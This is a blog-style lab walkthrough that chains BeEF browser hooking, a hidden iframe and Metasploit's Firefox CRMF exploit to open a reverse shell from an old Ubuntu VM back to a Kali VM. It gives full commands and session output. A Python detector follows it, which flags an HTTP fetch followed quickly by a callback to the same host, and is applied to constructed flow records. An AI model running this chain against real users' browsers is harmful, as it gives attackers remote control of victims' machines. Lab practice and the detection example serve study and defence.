Ingredients
Bake the following VMs (I use VMware; I guess this will work with VirtualBox too, but I haven't tried it):
- Kali Linux (of course)
- Ubuntu Hardy Heron 8.04.1 LTS
  - Install Firefox 15.0.1
- For the purposes of this blog post, the Kali Linux VM has the IP address 192.168.70.212 and the Ubuntu VM has 192.168.70.225; you will need to change these to suit your local setup
- I would use the NAT or Local Host-only networking configuration for your VMware setup
Kali Linux
- Check that BeEF is installed
  - apt-get install beef-xss
- Enable Metasploit integration
  - Edit /etc/beef-xss/config.yaml
    - Set metasploit:
          enable: true
  - Edit /usr/share/beef-xss/extensions/metasploit/config.yaml
    - Set host and callback_host to be the IP address of the external interface of your Kali Linux VM
- Start msfconsole and then issue the following command to enable the RPC server:
  - load msgrpc ServerHost=<your IP address> Pass=abc123
- Start BeEF
  - cd /usr/share/beef-xss
  - beef -x
- You can now browse to the BeEF UI (user/pass: beef) and start hooking browsers! :-)
Ubuntu
- BeEF supplies you with two demo pages. I found the advanced one to be more reliable, so fire up Firefox 15.0.1 and browse to:
- Your browser will now be hooked into BeEF. If you go back to your Kali VM and check out the BeEF panel, you should see your browser hooked there.
- There are all kinds of funky things that you can do, but for now we're going to concentrate on popping a shell
Kali Linux
- Go to your running msfconsole and enter
  - use exploit/multi/browser/firefox_proto_crmfrequest
  - set PAYLOAD firefox/shell_reverse_tcp
  - set LHOST 192.168.70.212
  - exploit
- Now metasploit should be running the exploit server and it will provide you with a target URL (http://192.168.70.212:8080/GS0HRW52gQ5Vt), the next step is to get the victim browser to access it
- The stealthy way to do this is to get BEEF to generate an invisible iframe for you on the victim browser
- Go back to the BEEF panel and choose your hooked browser and then:
  - Commands -> Misc -> Create invisible iframe
  - In the URL, put the target URL you got from metasploit (e.g., http://192.168.70.212:8080/GS0HRW52gQ5Vt)
- You should now see the following output in msfconsole:
  - [*] 192.168.70.225 firefox_proto_crmfrequest - Gathering target information.
  - [*] 192.168.70.225 firefox_proto_crmfrequest - Sending response HTML.
  - [*] 192.168.70.225 firefox_proto_crmfrequest - Sending HTML
  - [*] 192.168.70.225 firefox_proto_crmfrequest - Sending the malicious addon
  - [*] Command shell session 1 opened (192.168.70.212:4444 -> 192.168.70.225:46429) at 2014-04-04 12:11:44 +0100
- Congrats, you've now popped a shell! :-)
  - Confirm with: sessions -l
  - Start to interact with it with: sessions -i <session number>
  - Try something like:
    - uname -a
      Linux vuln-client 2.6.24-26-generic #1 SMP Tue Dec 1 18:37:31 UTC 2009 i686 GNU/Linux
- Enjoy the pwnage, poppin' shells like you're at a seafood restaurant! ;-)
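
A defender's view of the exchange in the msfconsole output above, as an added example that is not part of the original post: the client fetches a page from 192.168.70.212:8080 and seconds later opens a connection back to the same host on port 4444. The flow-record format, the 30-second window, the function names and the sample records are all constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed flow records (not captured traffic): time, client, client port,
# server, server port, application protocol as classified by the sensor.
SAMPLE_FLOWS = """\
2014-04-04T12:10:02 192.168.70.225 46390 192.168.70.1 53 dns
2014-04-04T12:11:40 192.168.70.225 46421 192.168.70.212 8080 http
2014-04-04T12:11:44 192.168.70.225 46429 192.168.70.212 4444 unknown
2014-04-04T12:12:10 192.168.70.225 46433 192.168.70.10 443 tls
2014-04-04T12:30:00 192.168.70.226 51000 192.168.70.212 8080 http
2014-04-04T13:45:00 192.168.70.226 51044 192.168.70.212 4444 unknown
this line is malformed and must be skipped
"""

WINDOW = timedelta(seconds=30)  # assumed correlation window, tune per network


def parse_flows(text):
    """Parse whitespace-separated flow records, skipping malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, src, _sport, dst, dport, app = parts
        flows.append({"ts": datetime.fromisoformat(ts), "src": src,
                      "dst": dst, "dport": int(dport), "app": app})
    return sorted(flows, key=lambda f: f["ts"])


def find_callbacks(flows, window=WINDOW):
    """Flag an unclassified connection from a client to a host it fetched
    HTTP from within `window`, when it goes to a different port."""
    last_http = {}  # (client, server) -> (time, port) of latest HTTP fetch
    alerts = []
    for f in flows:
        key = (f["src"], f["dst"])
        if f["app"] == "http":
            last_http[key] = (f["ts"], f["dport"])
        elif f["app"] == "unknown" and key in last_http:
            seen, http_port = last_http[key]
            delay = f["ts"] - seen
            if f["dport"] != http_port and delay <= window:
                alerts.append((f["src"], f["dst"], http_port,
                               f["dport"], delay.total_seconds()))
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print("possible browser-exploit callback:", alert)
```

The second client in the sample contacts the same two ports more than an hour apart and is not flagged, which shows what the time window is for.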